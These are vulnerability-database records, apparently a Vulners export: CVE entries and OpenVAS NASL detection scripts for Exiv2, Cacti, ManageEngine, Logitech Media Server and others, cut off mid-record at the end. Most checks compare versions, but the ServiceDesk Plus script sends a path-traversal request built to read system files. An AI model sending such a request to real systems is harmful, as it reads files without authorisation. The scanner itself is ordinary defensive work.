{"id": "SECURITYVULNS:VULN:9239", "bulletinFamily": "software", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.\r\nosCommerce: crossite scripting.", "published": "2008-08-23T00:00:00", "modified": "2008-08-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9239", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:20393"], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:09:30", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "c2d0c37c960b4cf4dfe5ac15a540b2c7"}, {"key": "href", "hash": "7d94102574616f9e3e9d4a369c0446eb"}, {"key": "modified", "hash": "894842b69b393d830f1f859d9cc6537d"}, {"key": "published", "hash": "894842b69b393d830f1f859d9cc6537d"}, {"key": "references", "hash": "0193412f2f451e4936a7192ca8c601db"}, {"key": "reporter", "hash": "7215ee9c7d9dc229d2921a40e899ec5f"}, {"key": "title", "hash": "c71de4d0becfd832639c1439702d0d67"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "252ef1ad7196886027a7da598675115ca4f61da033f938a09f470b1b1beb5b4d", "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-08-31T11:09:30"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "affectedSoftware": []}

{"cve": [{"lastseen": "2018-06-29T14:32:26", "references": ["https://nodesecurity.io/advisories/51"], "description": "ansi2html is vulnerable to regular expression denial of service (ReDoS) when certain types of user input is passed in.", "edition": 2, "reporter": "NVD", "published": "2018-05-31T16:29:00", "title": "CVE-2015-9239", "type": "cve", "enchantments": {"score": {"modified": "2018-06-29T14:32:26", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-9239"], "scanner": [], "modified": "2018-06-28T09:27:54", "cpe": ["cpe:/a:ansi2html_project:ansi2html"], "id": "CVE-2015-9239", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9239", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-14T11:28:46", "references": ["http://www.securityfocus.com/bid/98720", "http://dev.exiv2.org/issues/1295", "https://github.com/lolo-pop/poc/tree/master/Segmentation%20fault%20in%20convert-test(exiv2)"], "description": "An issue was discovered in Exiv2 0.26. When the data structure of the structure ifd is incorrect, the program assigns pValue_ to 0x0, and the value of pValue() is 0x0. TiffImageEntry::doWriteImage will use the value of pValue() to cause a segmentation fault. To exploit this vulnerability, someone must open a crafted tiff file.", "edition": 4, "reporter": "NVD", "published": "2017-05-26T06:29:00", "title": "CVE-2017-9239", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-9239"], "scanner": [], "modified": "2018-08-13T17:47:58", "cpe": ["cpe:/a:exiv2:exiv2:0.26"], "id": "CVE-2017-9239", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9239", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-01T23:39:48", "references": ["https://lists.debian.org/debian-lts-announce/2017/05/msg00033.html"], "pluginID": "1361412562310890963", "description": "It was discovered that the exiv2 library fails to parse some crafted\ntiff images, leading to denial of service via application crash.", "edition": 7, "reporter": "Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net", "published": "2018-01-25T00:00:00", "title": "Debian LTS Advisory ([SECURITY] [DLA 963-1] exiv2 security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9239"], "modified": "2018-07-10T00:00:00", "id": "OPENVAS:1361412562310890963", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310890963", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_963.nasl 10474 2018-07-10 08:12:26Z cfischer $\n#\n# Auto-generated from advisory DLA 963-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.890963\");\n script_version(\"$Revision: 10474 $\");\n script_cve_id(\"CVE-2017-9239\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 963-1] exiv2 security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-10 10:12:26 +0200 (Tue, 10 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-25 00:00:00 +0100 (Thu, 25 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/05/msg00033.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"exiv2 on Debian Linux\");\n script_tag(name:\"insight\", value:\"Exiv2 is a C++ library and a command line utility to manage image metadata.\nIt provides fast and easy read and write access to the Exif, IPTC and XMP\nmetadata of images in various formats\");\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n0.23-1+deb7u1.\n\nWe recommend that you upgrade your exiv2 packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that the exiv2 library fails to parse some crafted\ntiff images, leading to denial of service via application crash.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exiv2\", ver:\"0.23-1+deb7u1\", rls_regex:\"DEB7\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libexiv2-12\", ver:\"0.23-1+deb7u1\", rls_regex:\"DEB7\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libexiv2-dbg\", ver:\"0.23-1+deb7u1\", rls_regex:\"DEB7\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libexiv2-dev\", ver:\"0.23-1+deb7u1\", rls_regex:\"DEB7\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libexiv2-doc\", ver:\"0.23-1+deb7u1\", rls_regex:\"DEB7\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:44:32", "references": ["https://www.tenable.com/security/research/tra-2017-31"], "pluginID": "1361412562310140496", "description": "ManageEngine ServiceDesk Plus is prone to multiple arbitrary file download\nvulnerabilities.", "edition": 7, "reporter": "This script is Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-09T00:00:00", "title": "ManageEngine ServiceDesk Plus Multiple Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11511", "CVE-2017-11512"], "modified": "2018-05-18T00:00:00", "id": "OPENVAS:1361412562310140496", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140496", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_manageengine_servicedesk_mult_vuln.nasl 9895 2018-05-18 04:24:05Z ckuersteiner $\n#\n# ManageEngine ServiceDesk Plus Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:manageengine:servicedesk_plus\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140496\");\n script_version(\"$Revision: 9895 $\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-05-18 06:24:05 +0200 (Fri, 18 May 2018) $\");\n script_tag(name: \"creation_date\", value: \"2017-11-09 15:13:18 +0700 (Thu, 09 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2017-11511\", \"CVE-2017-11512\");\n\n script_tag(name: \"qod_type\", value: \"exploit\");\n\n script_tag(name: \"solution_type\", value: \"NoneAvailable\");\n\n script_name(\"ManageEngine ServiceDesk Plus Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_ManageEngine_ServiceDesk_Plus_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ManageEngine/ServiceDeskPlus/installed\");\n\n script_tag(name: \"summary\", value: \"ManageEngine ServiceDesk Plus is prone to multiple arbitrary file download\nvulnerabilities.\");\n\n script_tag(name: \"insight\", value: \"ServiceDesk provides an interface for unauthenticated remote users to\ndownload files and snapshots. Due to the lack of validation an attacker can use this to traverse directories and\ndownload arbitrary files.\");\n\n script_tag(name: \"vuldetect\", value: \"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name: \"solution\", value: \"No known solution is available as of 18th May, 2018. Information regarding\nthis issue will be updated once solution details are available.\");\n\n script_xref(name: \"URL\", value: \"https://www.tenable.com/security/research/tra-2017-31\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nfiles = traversal_files();\n\nforeach file (keys(files)) {\n url = '/fosagent/repl/download-file?basedir=4&filepath=' + crap(data: \"..\\\", length: 10*3) + files[file];\n if (http_vuln_check(port: port, url: url, pattern: file, check_header: TRUE)) {\n report = report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:41:59", "references": ["https://github.com/Cacti/cacti/issues/1057"], "pluginID": "1361412562310112110", "description": "lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators\n to execute arbitrary OS commands via the path_rrdtool parameter in an action=save request to settings.php.", "edition": 5, "reporter": "This script is Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-08T00:00:00", "title": "Cacti RCE Vulnerability (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16641"], "modified": "2018-03-28T00:00:00", "id": "OPENVAS:1361412562310112110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112110", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cacti_rce_vuln_win.nasl 9239 2018-03-28 09:30:02Z ckuersteiner $\n#\n# Cacti RCE Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112110\");\n script_version(\"$Revision: 9239 $\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-03-28 11:30:02 +0200 (Wed, 28 Mar 2018) $\");\n script_tag(name: \"creation_date\", value: \"2017-11-08 08:17:48 +0100 (Wed, 08 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-16641\");\n\n script_tag(name: \"qod_type\", value: \"remote_banner\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Cacti RCE Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"cacti_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"cacti/installed\", \"Host/runs_windows\");\n\n script_tag(name: \"summary\", value: \"lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators\n to execute arbitrary OS commands via the path_rrdtool parameter in an action=save request to settings.php.\");\n\n script_tag(name: \"vuldetect\", value: \"Checks the version.\");\n\n script_tag(name: \"affected\", value: \"Cacti version 1.1.27.\");\n\n script_tag(name: \"solution\", value: \"Update to versijon 1.1.28 or later.\");\n\n script_xref(name: \"URL\", value: \"https://github.com/Cacti/cacti/issues/1057\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"1.1.27\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"1.2.28\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:40:45", "references": ["https://github.com/Cacti/cacti/issues/1057"], "pluginID": "1361412562310112111", "description": "lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators\n to execute arbitrary OS commands via the path_rrdtool parameter in an action=save request to settings.php.", "edition": 5, "reporter": "This script is Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-08T00:00:00", "title": "Cacti RCE Vulnerability (Linux)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16641"], "modified": "2018-03-28T00:00:00", "id": "OPENVAS:1361412562310112111", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112111", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cacti_rce_vuln_lin.nasl 9239 2018-03-28 09:30:02Z ckuersteiner $\n#\n# Cacti RCE Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112111\");\n script_version(\"$Revision: 9239 $\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-03-28 11:30:02 +0200 (Wed, 28 Mar 2018) $\");\n script_tag(name: \"creation_date\", value: \"2017-11-08 08:28:48 +0100 (Wed, 08 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-16641\");\n\n script_tag(name: \"qod_type\", value: \"remote_banner_unreliable\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Cacti RCE Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"cacti_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"cacti/installed\", \"Host/runs_unixoide\");\n\n script_tag(name: \"summary\", value: \"lib/rrd.php in Cacti 1.1.27 allows remote authenticated administrators\n to execute arbitrary OS commands via the path_rrdtool parameter in an action=save request to settings.php.\");\n\n script_tag(name: \"vuldetect\", value: \"Checks the version.\");\n\n script_tag(name: \"affected\", value: \"Cacti version 1.1.27.\");\n\n script_tag(name: \"solution\", value: \"Update to version 1.1.28 or later.\");\n\n script_xref(name: \"URL\", value: \"https://github.com/Cacti/cacti/issues/1057\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"1.1.27\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"1.1.28\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:44:20", "references": ["https://www.exploit-db.com/exploits/43122", "https://www.exploit-db.com/exploits/43123"], "pluginID": "1361412562310811895", "description": "This host is running Logitech Media Server\n and is prone to multiple stored cross site scripting vulnerabilities.", "edition": 8, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-07T00:00:00", "title": "Logitech Media Server Multiple Persistent XSS Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16567", "CVE-2017-16568"], "modified": "2018-05-18T00:00:00", "id": "OPENVAS:1361412562310811895", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811895", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_logitech_media_server_mult_stored_xss_vuln.nasl 9895 2018-05-18 04:24:05Z ckuersteiner $\n#\n# Logitech Media Server Multiple Persistent XSS Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:logitech:media_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811895\");\n script_version(\"$Revision: 9895 $\");\n script_cve_id(\"CVE-2017-16568\", \"CVE-2017-16567\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-18 06:24:05 +0200 (Fri, 18 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-07 14:00:28 +0530 (Tue, 07 Nov 2017)\");\n script_name(\"Logitech Media Server Multiple Persistent XSS Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Logitech Media Server\n and is prone to multiple stored cross site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help\n of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to an insufficient\n validation of user supplied input via new favorite field value in favorites \n tab and new URL value in Radio URL tab.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n users to execute arbitrary script code in the browser of an unsuspecting user \n in the context of the affected site. This may allow the attacker to steal \n cookie-based authentication credentials and launch other attacks.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"Logitech Media Server version 7.9.0\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 18th May, 2018. Information regarding\nthis issue will be updated once solution details are available.\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name : \"URL\" , value : \"https://www.exploit-db.com/exploits/43123\");\n script_xref(name : \"URL\" , value : \"https://www.exploit-db.com/exploits/43122\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_logitech_media_server_detect.nasl\");\n script_mandatory_keys(\"Logitech/Media/Server/Installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!logPort = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:logPort, exit_no_version:TRUE)) exit(0);\nlogVer = infos['version'];\npath = infos['location'];\n\nif(logVer == \"7.9.0\")\n{\n report = report_fixed_ver(installed_version:logVer, fixed_version:\"NoneAvailable\", install_path:path);\n security_message(data:report, port:logPort);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-20T16:03:56", "references": ["https://code610.blogspot.de/2017/11/sql-injection-in-manageengine.html"], "pluginID": "1361412562310107251", "description": "ManageEngine Applications Manager is prone to a SQL injection\nvulnerability.", "edition": 10, "reporter": "This script is Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-07T00:00:00", "title": "ManageEngine Applications Manager SQL Injection Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16542", "CVE-2017-16543"], "modified": "2018-09-19T00:00:00", "id": "OPENVAS:1361412562310107251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107251", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_manageengine_appli_manager_sql_inj_vul.nasl 11472 2018-09-19 11:20:06Z mmartin $\n#\n# ManageEngine Applications Manager SQL Injection Vulnerability\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:manageengine:applications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107251\");\n script_version(\"$Revision: 11472 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-19 13:20:06 +0200 (Wed, 19 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-07 15:43:15 +0700 (Tue, 07 Nov 2017)\");\n\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-16542\", \"CVE-2017-16543\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_name(\"ManageEngine Applications Manager SQL Injection Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_manage_engine_appli_manager_detect.nasl\");\n script_mandatory_keys(\"ManageEngine/Applications/Manager/Installed\");\n\n script_tag(name:\"summary\", value:\"ManageEngine Applications Manager is prone to a SQL injection\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"ManageEngine Applications Manager is vulnerable to SQL injection via the\nname parameter in a manageApplications.do request and via GraphicalView.do, as demonstrated by a\ncrafted viewProps yCanvas field or viewid parameter.\");\n\n script_tag(name:\"vuldetect\", value:\"Check the version.\");\n\n script_tag(name:\"affected\", value:\"ManageEngine Applications Manager 13.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 04th June, 2018. Information regarding\nthis issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"https://code610.blogspot.de/2017/11/sql-injection-in-manageengine.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^13.*\")\n{\n if (version_is_less_equal(version: version, test_version: \"13430\"))\n {\n report = report_fixed_ver(installed_version: version, fixed_version: \"NoneAvailable\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:41:49", "references": ["https://blogs.securiteam.com/index.php/archives/3444"], "pluginID": "1361412562310107183", "description": "A Tiandy IP Camera is running on this host and is prone to a sensitive information disclosure vulnerability.", "edition": 10, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-10-04T00:00:00", "title": "Tiandy IP cameras Sensitive Information Disclosure Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-15236"], "modified": "2018-06-04T00:00:00", "id": "OPENVAS:1361412562310107183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107183", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_tiandy_tech_info_disc_vuln.nasl 